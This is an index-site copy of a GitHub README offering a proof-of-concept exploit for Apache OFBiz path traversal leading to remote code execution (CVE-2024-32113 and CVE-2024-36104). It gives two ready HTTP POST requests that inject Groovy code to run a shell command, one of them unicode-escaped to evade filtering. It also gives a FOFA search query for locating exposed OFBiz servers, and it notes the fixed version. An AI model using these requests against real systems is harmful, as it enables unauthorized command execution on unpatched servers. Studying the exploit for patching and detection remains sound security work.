Data

Tools

Indexes

Applications

Experiments

Awesome

An open API service indexing awesome lists of open source software.

https://github.com/mr-xn/cve-2024-32113

Apache OFBIZ Path traversal leading to RCE POC[CVE-2024-32113 & CVE-2024-36104]
https://github.com/mr-xn/cve-2024-32113

apache cve cve-2024 cve-2024-32113 cve-2024-36104 ofbiz poc rce rce-exploit

Last synced: about 1 month ago
JSON representation

Apache OFBIZ Path traversal leading to RCE POC[CVE-2024-32113 & CVE-2024-36104]

Awesome Lists containing this project

README 

        
# CVE-2024-32113



> Apache  OFBIZ Path traversal leading to RCE EXP.



Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz.This issue affects Apache OFBiz: before **18.12.14[not include]**. Users are recommended to upgrade to version **18.12.14**, which fixes the issue.



# fofa query



> app="Apache_OFBiz"



# POC



```http

POST /webtools/control/forgotPassword;/ProgramExport HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: 127.0.0.1:8443



groovyProgram=throw+new+Exception('id'.execute().text);

```



> excute `id` with unicode.

> 

```http

POST /webtools/control/forgotPassword;/ProgramExport HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: 127.0.0.1:8443



groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0064\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b

```



![SCR-20240603-uowf](https://github.com/Mr-xn/CVE-2024-32113/assets/18260135/150d3c39-3ff0-4866-add0-5a2734e002e3)



# refercence

- https://issues.apache.org/jira/browse/OFBIZ-13006

- https://xz.aliyun.com/t/14733